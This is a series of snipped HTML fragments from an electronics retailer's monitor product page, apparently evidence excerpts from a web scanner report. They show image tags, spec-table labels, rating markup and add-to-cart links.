</a><img src="http://images.highspeedbackbone.net/itemdetails/0_3.gif" height="41" border="0"><a href="javascript:MM_openBrWindow('/include/AddCartfromGallery.asp?EdpNo=6532393&amp;csid=ITD&amp;Sku=S203-2293&amp;imgcart=1','ImageCart','scrollbars=no,width=525,height=768')" rel="nofollow" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('Image1','','http://images.highspeedbackbone.net/itemdetails/1_2.gif',1)"><img src="http://images.highspeedbackbone.net/itemdetails/1_1.gif" height="41" border="0" name="Image1"></a>
...[SNIP]...
?EdpNo=6532393&amp;csid=ITD&amp;body=REVIEWS#tabs" rel="nofollow" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('Image11','','http://images.highspeedbackbone.net/itemdetails/11_2.gif',1)"><img src="http://images.highspeedbackbone.net/itemdetails/11_1.gif" height="41" border="0" name="Image11"></a>
...[SNIP]...
s.asp?EdpNo=6532393&amp;csid=ITD&amp;body=QA#tabs" rel="nofollow" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('Image14','','http://images.highspeedbackbone.net/itemdetails/14_2.gif',1)"><img src="http://images.highspeedbackbone.net/itemdetails/14_1.gif" height="41" border="0" name="Image14"></a>
...[SNIP]...
D&amp;body=MAIN#productresources" rel="nofollow" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('Image9','','http://images.highspeedbackbone.net/itemDetails/techspedia/button_over.jpg',1)"><img src="http://images.highspeedbackbone.net/itemDetails/techspedia/button.jpg" height="41" border="0" name="Image9"></a>
...[SNIP]...
p?EdpNo=6532393&amp;csid=ITD&amp;body=WARRANTY#tabs" rel="nofollow" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('Image7','','http://images.highspeedbackbone.net/itemdetails/7_2.gif',1)"><img src="http://images.highspeedbackbone.net/itemdetails/7_1.gif" height="41" border="0" name="Image7"></a>
...[SNIP]...
<a href="/sectors/ironclad/index.asp" rel="nofollow"><img src="http://images.highspeedbackbone.net/itemdetails/tab30day-b.gif" width="78" height="41" border="0"></a>
...[SNIP]...
pt:loadWindowGen('/include/whybuy.asp',600,600)" rel="nofollow" onmouseover="MM_swapImage('whybuy','','http://images.highspeedbackbone.net/itemdetails/tab13_1.gif',1)" onmouseout="MM_swapImgRestore()"><img src="http://images.highspeedbackbone.net/itemdetails/tab13_0.gif" name="whybuy" width="63" height="41" border="0" id="whybuy"></a><img src="http://images.highspeedbackbone.net/itemdetails/infotable_rightside1.gif" width="7" height="41" border="0"></td>
...[SNIP]...
<td valign="top" class="font_size3"><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="100%" height="5"><P>
...[SNIP]...
<br><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="10"><img src="http://images.highspeedbackbone.net/item-details/duopixel.gif" width="100%" height="2"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="5"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="5"></td>
...[SNIP]...
<td class="techspec" width="45%"><img align="absmiddle" src="http://images.highspeedbackbone.net/main/gfx-blkbullet.jpg">.
LED Backlight:.
</td>
...[SNIP]...
<td height="1"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
<td height="1" bgcolor="#f5f5f5" colspan="2"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td colspan="3"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td class="techspec" width="45%"><img align="absmiddle" src="http://images.highspeedbackbone.net/main/gfx-blkbullet.jpg">.
Display Type:.
</td>
...[SNIP]...
<td height="1"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
<td height="1" bgcolor="#f5f5f5" colspan="2"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td colspan="3"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td class="techspec" width="45%"><img align="absmiddle" src="http://images.highspeedbackbone.net/main/gfx-blkbullet.jpg">.
Screen Size:.
</td>
...[SNIP]...
<td height="1"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
<td height="1" bgcolor="#f5f5f5" colspan="2"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td colspan="3"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td class="techspec" width="45%"><img align="absmiddle" src="http://images.highspeedbackbone.net/main/gfx-blkbullet.jpg">.
Widescreen:.
</td>
...[SNIP]...
<td height="1"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
<td height="1" bgcolor="#f5f5f5" colspan="2"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td colspan="3"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td class="techspec" width="45%"><img align="absmiddle" src="http://images.highspeedbackbone.net/main/gfx-blkbullet.jpg">.
Diagonal Size:.
</td>
...[SNIP]...
<td height="1"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
<td height="1" bgcolor="#f5f5f5" colspan="2"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td colspan="3"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td class="techspec" width="45%"><img align="absmiddle" src="http://images.highspeedbackbone.net/main/gfx-blkbullet.jpg">.
Display Colors:.
</td>
...[SNIP]...
<td height="1"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
<td height="1" bgcolor="#f5f5f5" colspan="2"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td colspan="3"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td class="techspec" width="45%"><img align="absmiddle" src="http://images.highspeedbackbone.net/main/gfx-blkbullet.jpg">.
Display Format:.
</td>
...[SNIP]...
<td height="1"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
<td height="1" bgcolor="#f5f5f5" colspan="2"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td colspan="3"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td class="techspec" width="45%"><img align="absmiddle" src="http://images.highspeedbackbone.net/main/gfx-blkbullet.jpg">.
Touch Screen:.
</td>
...[SNIP]...
<td height="1"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
<td height="1" bgcolor="#f5f5f5" colspan="2"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td colspan="3"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td class="techspec" width="45%"><img align="absmiddle" src="http://images.highspeedbackbone.net/main/gfx-blkbullet.jpg">.
Interface Type:.
</td>
...[SNIP]...
<td height="1"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
<td height="1" bgcolor="#f5f5f5" colspan="2"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td colspan="3"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td class="techspec" width="45%"><img align="absmiddle" src="http://images.highspeedbackbone.net/main/gfx-blkbullet.jpg">.
HDMI:.
</td>
...[SNIP]...
<td height="1"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
<td height="1" bgcolor="#f5f5f5" colspan="2"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td colspan="3"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td class="techspec" width="45%"><img align="absmiddle" src="http://images.highspeedbackbone.net/main/gfx-blkbullet.jpg">.
Maximum Resolution:.
</td>
...[SNIP]...
<td height="1"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
<td height="1" bgcolor="#f5f5f5" colspan="2"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td colspan="3"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td class="techspec" width="45%"><img align="absmiddle" src="http://images.highspeedbackbone.net/main/gfx-blkbullet.jpg">.
Condition:.
</td>
...[SNIP]...
<td height="1"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
<td height="1" bgcolor="#f5f5f5" colspan="2"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td colspan="3"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td class="techspec" width="45%"><img align="absmiddle" src="http://images.highspeedbackbone.net/main/gfx-blkbullet.jpg">.
Features:.
</td>
...[SNIP]...
<td height="1"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
<td height="1" bgcolor="#f5f5f5" colspan="2"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td colspan="3"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td class="techspec" width="45%"><img align="absmiddle" src="http://images.highspeedbackbone.net/main/gfx-blkbullet.jpg">.
Speakers:.
</td>
...[SNIP]...
<td height="1"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
<td height="1" bgcolor="#f5f5f5" colspan="2"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td colspan="3"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td class="techspec" width="45%"><img align="absmiddle" src="http://images.highspeedbackbone.net/main/gfx-blkbullet.jpg">.
Contrast Ratio:.
</td>
...[SNIP]...
<td height="1"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
<td height="1" bgcolor="#f5f5f5" colspan="2"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td colspan="3"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td class="techspec" width="45%"><img align="absmiddle" src="http://images.highspeedbackbone.net/main/gfx-blkbullet.jpg">.
Dynamic Contrast Ratio:.
</td>
...[SNIP]...
<td height="1"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
<td height="1" bgcolor="#f5f5f5" colspan="2"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td colspan="3"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td class="techspec" width="45%"><img align="absmiddle" src="http://images.highspeedbackbone.net/main/gfx-blkbullet.jpg">.
Brightness:.
</td>
...[SNIP]...
<td height="1"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
<td height="1" bgcolor="#f5f5f5" colspan="2"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td colspan="3"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td class="techspec" width="45%"><img align="absmiddle" src="http://images.highspeedbackbone.net/main/gfx-blkbullet.jpg">.
Response Time:.
</td>
...[SNIP]...
<td height="1"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
<td height="1" bgcolor="#f5f5f5" colspan="2"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td colspan="3"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td class="techspec" width="45%"><img align="absmiddle" src="http://images.highspeedbackbone.net/main/gfx-blkbullet.jpg">.
Horizontal Viewing Angle:.
</td>
...[SNIP]...
<td height="1"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
<td height="1" bgcolor="#f5f5f5" colspan="2"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td colspan="3"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td class="techspec" width="45%"><img align="absmiddle" src="http://images.highspeedbackbone.net/main/gfx-blkbullet.jpg">.
Vertical Viewing Angle:.
</td>
...[SNIP]...
<td height="1"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
<td height="1" bgcolor="#f5f5f5" colspan="2"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td colspan="3"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td class="techspec" width="45%"><img align="absmiddle" src="http://images.highspeedbackbone.net/main/gfx-blkbullet.jpg">.
VESA Mounting Compliant:.
</td>
...[SNIP]...
<td height="1"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
<td height="1" bgcolor="#f5f5f5" colspan="2"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td colspan="3"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td class="techspec" width="45%"><img align="absmiddle" src="http://images.highspeedbackbone.net/main/gfx-blkbullet.jpg">.
Dimensions With Stand:.
</td>
...[SNIP]...
<td height="1"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
<td height="1" bgcolor="#f5f5f5" colspan="2"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td colspan="3"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td class="techspec" width="45%"><img align="absmiddle" src="http://images.highspeedbackbone.net/main/gfx-blkbullet.jpg">.
Unit Weight:.
</td>
...[SNIP]...
<td height="1"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
<td height="1" bgcolor="#f5f5f5" colspan="2"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td colspan="3"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td class="techspec" width="45%"><img align="absmiddle" src="http://images.highspeedbackbone.net/main/gfx-blkbullet.jpg">.
Power Consumption:.
</td>
...[SNIP]...
<td height="1"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
<td height="1" bgcolor="#f5f5f5" colspan="2"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td colspan="3"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="10"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="10"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/item-details/duopixel.gif" width="100%" height="2"></td>
...[SNIP]...
<td valign="top" class="font_size3"><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="100%" height="10"><span class="font_size4bold">
...[SNIP]...
<p><img src="http://images.highspeedbackbone.net/SKUimages/gallery/large/S203-2293-call01-jfwd.jpg"></p>
<p><img src="http://images.highspeedbackbone.net/SKUimages/gallery/large/S203-2293-call02-jfwd.jpg"></p>
<p><img src="http://images.highspeedbackbone.net/SKUimages/gallery/large/S203-2293-call03-jfwd.jpg"></p>
<p><img src="http://images.highspeedbackbone.net/SKUimages/gallery/large/S203-2293-call04-jfwd.jpg"></p>
<p><img src="http://images.highspeedbackbone.net/SKUimages/gallery/large/S203-2293-call05-jfwd.jpg"></p>
<p><img src="http://images.highspeedbackbone.net/SKUimages/gallery/large/S203-2293-call06-jfwd.jpg"></p>
<p><img src="http://images.highspeedbackbone.net/SKUimages/gallery/large/S203-2293-call07-jfwd.jpg"></p>
<p><img src="http://images.highspeedbackbone.net/SKUimages/gallery/large/S203-2293-call08-jfwd.jpg"></p>
<p><img src="http://images.highspeedbackbone.net/SKUimages/gallery/large/S203-2293-call09-jfwd.jpg"></p>
<p><img src="http://images.highspeedbackbone.net/SKUimages/gallery/large/S203-2293-call10-jfwd.jpg"></p>
<p><img src="http://images.highspeedbackbone.net/SKUimages/gallery/large/S203-2293-call11-jfwd.jpg"></p>
<p><img src="http://images.highspeedbackbone.net/SKUimages/gallery/large/S203-2293-call12-jfwd.jpg"></p>
...[SNIP]...
</table><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="10"><img src="http://images.highspeedbackbone.net/item-details/duopixel.gif" width="100%" height="2"></td>
...[SNIP]...
<td width="48%"><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="20"><span class="ReviewMainHeading">
...[SNIP]...
<span class="ReviewMainHeadingBottom">
                               Customer Rating:.
                                   <img style="vertical-align:bottom" src="http://images.highspeedbackbone.net/ratingstars/star9.gif">
                               .
                                   4.1<br>
...[SNIP]...
<br><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="10"></td>
...[SNIP]...
<td height="12" align="left"><img src="http://images.highspeedbackbone.net/item-details/bbox_bar.gif" height="10" width="125"></td>
...[SNIP]...
<td height="12" align="left"><img src="http://images.highspeedbackbone.net/item-details/bbox_bar.gif" height="10" width="100"><img src="http://images.highspeedbackbone.net/item-details/bbox_bg.gif" height="10" width="25"></td>
...[SNIP]...
<td height="12" align="left"><img src="http://images.highspeedbackbone.net/item-details/bbox_bar.gif" height="10" width="100"><img src="http://images.highspeedbackbone.net/item-details/bbox_bg.gif" height="10" width="25"></td>
...[SNIP]...
<td height="12" align="left"><img src="http://images.highspeedbackbone.net/item-details/bbox_bar.gif" height="10" width="88"><img src="http://images.highspeedbackbone.net/item-details/bbox_bg.gif" height="10" width="37"></td>
...[SNIP]...
<a href="/applications/searchtools/item-details.asp?EdpNo=6532393&amp;csid=ITD&amp;body=REVIEWS&amp;ReviewMode=1#WriteReview"><img src="http://images.highspeedbackbone.net/item-details/Button1_WriteReview.gif" border="0"></a>
...[SNIP]...
</table><img src="http://images.highspeedbackbone.net/item-details/duopixel.gif" width="100%" height="1" vspace="10"><br>
...[SNIP]...
<span class="ReviewCustomerRating">Customer Rating:.
                                                       <img style="vertical-align:bottom" src="http://images.highspeedbackbone.net/ratingstars/star8.gif">.
                                                       4.0<img src="http://images.highspeedbackbone.net/item-details/duopixel.gif" width="96%" height="1" vspace="10"></span>
...[SNIP]...
<td height="15" align="left"><img src="http://images.highspeedbackbone.net/item-details/bbox_bar.gif" height="10" width="125"></td>
...[SNIP]...
<td height="15" align="left"><img src="http://images.highspeedbackbone.net/item-details/bbox_bar.gif" height="10" width="125"></td>
...[SNIP]...
<td height="15" align="left"><img src="http://images.highspeedbackbone.net/item-details/bbox_bar.gif" height="10" width="75"><img src="http://images.highspeedbackbone.net/item-details/bbox_bg.gif" height="10" width="50"></td>
...[SNIP]...
<td height="15" align="left"><img src="http://images.highspeedbackbone.net/item-details/bbox_bar.gif" height="10" width="75"><img src="http://images.highspeedbackbone.net/item-details/bbox_bg.gif" height="10" width="50"></td>
...[SNIP]...
</table><img src="http://images.highspeedbackbone.net/item-details/duopixel.gif" width="100%" height="1" vspace="15"><br>
...[SNIP]...
<span class="ReviewCustomerRating">Customer Rating:.
                                                       <img style="vertical-align:bottom" src="http://images.highspeedbackbone.net/ratingstars/star9.gif">.
                                                       4.3<img src="http://images.highspeedbackbone.net/item-details/duopixel.gif" width="96%" height="1" vspace="10"></span>
...[SNIP]...
<td height="15" align="left"><img src="http://images.highspeedbackbone.net/item-details/bbox_bar.gif" height="10" width="125"></td>
...[SNIP]...
<td height="15" align="left"><img src="http://images.highspeedbackbone.net/item-details/bbox_bar.gif" height="10" width="75"><img src="http://images.highspeedbackbone.net/item-details/bbox_bg.gif" height="10" width="50"></td>
...[SNIP]...
<td height="15" align="left"><img src="http://images.highspeedbackbone.net/item-details/bbox_bar.gif" height="10" width="125"></td>
...[SNIP]...
<td height="15" align="left"><img src="http://images.highspeedbackbone.net/item-details/bbox_bar.gif" height="10" width="100"><img src="http://images.highspeedbackbone.net/item-details/bbox_bg.gif" height="10" width="25"></td>
...[SNIP]...
</table><img src="http://images.highspeedbackbone.net/item-details/duopixel.gif" width="100%" height="1" vspace="15"><br>
...[SNIP]...
</table><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="10"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="18"></td>
...[SNIP]...
<h3 id="productresources"><img src="http://images.highspeedbackbone.net/itemDetails/techspedia/techspediaTLCa.jpg" width="620" height="40"></h3>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="10"></td>
...[SNIP]...
<li><a href="http://static.highspeedbackbone.net/html/guide_dual_monitors.html" target="_new">Technology Guide: Dual Monitors</a>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="18"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/item-details/duopixel.gif" width="100%" height="2"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/item-details/duopixel.gif" width="100%" height="2" vspace="2"></td>
...[SNIP]...
<a href="/applications/category/category_slc.asp?CatId=41&" target="_blank">

<img src="http://images.highspeedbackbone.net/itemDetails/tech/bluecleaner2.jpg" alt="LCD Monitor & TV Cleaning Tips" border="0" height="94" width="88"></a>
...[SNIP]...
<a href="index.html" target="_top">

<img src="http://images.highspeedbackbone.net/itemDetails/tech/techtip.jpg" alt="Technology Knowledge, Information, and Resources: Technology News, Information Articles, Product Manuals, How To Guides, Brochures and Fact Sheets, Computer Glossary, and Technical Encyclopedia" border="0" height="25" width="82"></a>
...[SNIP]...
<p><img src="http://images.highspeedbackbone.net/itemDetails/bundleline.jpg" width="440"></p>
...[SNIP]...
<a name="dualmonitors">
<img border="0" src="http://images.highspeedbackbone.net/itemDetails/tech/dualmonitors88.jpg" ></a>
...[SNIP]...
<p><img src="http://images.highspeedbackbone.net/itemDetails/bundleline.jpg" width="440"></p>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="18"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="12"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="12"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="18"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="15"></td>
...[SNIP]...
<a id="itemdets_submit_img" href="javascript:addToiCart(6532393,document.getElementById('q_6532393').value,'ITD');"><img src="http://images.highspeedbackbone.net/item-details/addtocart.jpg" border="0"></a>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/item-details/duopixel.gif" width="100%" height="2" vspace="10"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="10"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="10"></td>
...[SNIP]...
</font><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="10"><br>
...[SNIP]...
<td valign="center" align="left"><img src="http://images.highspeedbackbone.net/refresh.gif" onclick="parent.frames['CaptchaFrame'].window.location.reload();" style="cursor: pointer; cursor: hand;"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="7" height="1"></td>
...[SNIP]...
<a href="#" onclick="window.open('/sectors/help/TigerLiveAssistance.asp','livehelp','width=640, height=580, scrollbars=yes')"><img src="http://images.highspeedbackbone.net/rightnav/liveHelpIcon160.jpg" border="0" style="margin:0px auto;"></a>
...[SNIP]...
<td width="36"><img src="http://images.highspeedbackbone.net/homepage/ups_logo.gif" width="36" height="41"></td>
...[SNIP]...
<td width="25"><img src="http://images.highspeedbackbone.net/homepage/help_icon.gif" width="25" height="25"></td>
...[SNIP]...
<td height="5"><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="5"></td>
...[SNIP]...
<a href="/applications/searchtools/item-details.asp?EdpNo=4494089&amp;csid=_25"><img src="http://images.highspeedbackbone.net/skuimages/small/S123-2002-main01-am.jpg" border="0"></a>
...[SNIP]...
<a href="javascript:addToiCart(4494089,1,'_25');"><img border="0" src="http://images.highspeedbackbone.net/main/buynow_sm.gif"></a>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/bluepixel.gif" width="100%" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<a href="/applications/searchtools/item-details.asp?EdpNo=6074882&amp;csid=_25"><img src="http://images.highspeedbackbone.net/skuimages/small/S123-2020-main-or.jpg" border="0"></a>
...[SNIP]...
<a href="javascript:addToiCart(6074882,1,'_25');"><img border="0" src="http://images.highspeedbackbone.net/main/buynow_sm.gif"></a>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/bluepixel.gif" width="100%" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<a href="/applications/searchtools/item-details.asp?EdpNo=6680906&amp;csid=_25"><img src="http://images.highspeedbackbone.net/skuimages/small/E145-0452-Main-01-JH.jpg" border="0"></a>
...[SNIP]...
<a href="javascript:addToiCart(6680906,1,'_25');"><img border="0" src="http://images.highspeedbackbone.net/main/buynow_sm.gif"></a>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/bluepixel.gif" width="100%" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<a href="/applications/searchtools/item-details.asp?EdpNo=6321551&amp;csid=_25"><img src="http://images.highspeedbackbone.net/skuimages/small/U12-40889-main01-mc.jpg" border="0"></a>
...[SNIP]...
<a href="javascript:addToiCart(6321551,1,'_25');"><img border="0" src="http://images.highspeedbackbone.net/main/buynow_sm.gif"></a>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/bluepixel.gif" width="100%" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<a href="/applications/searchtools/item-details.asp?EdpNo=6321954&amp;csid=_25"><img src="http://images.highspeedbackbone.net/skuimages/small/P16-40922-mainx-hm.jpg" border="0"></a>
...[SNIP]...
<a href="javascript:addToiCart(6321954,1,'_25');"><img border="0" src="http://images.highspeedbackbone.net/main/buynow_sm.gif"></a>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/bluepixel.gif" width="100%" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<a href="/applications/searchtools/item-details.asp?EdpNo=6321953&amp;csid=_25"><img src="http://images.highspeedbackbone.net/skuimages/small/P16-40921-mainx-ac.jpg" border="0"></a>
...[SNIP]...
<a href="javascript:addToiCart(6321953,1,'_25');"><img border="0" src="http://images.highspeedbackbone.net/main/buynow_sm.gif"></a>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/bluepixel.gif" width="100%" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<a href="/applications/searchtools/item-details.asp?EdpNo=4558907&amp;csid=_25"><img src="http://images.highspeedbackbone.net/skuimages/small/U12-40512-Main-sp.jpg" border="0"></a>
...[SNIP]...
<a href="javascript:addToiCart(4558907,1,'_25');"><img border="0" src="http://images.highspeedbackbone.net/main/buynow_sm.gif"></a>
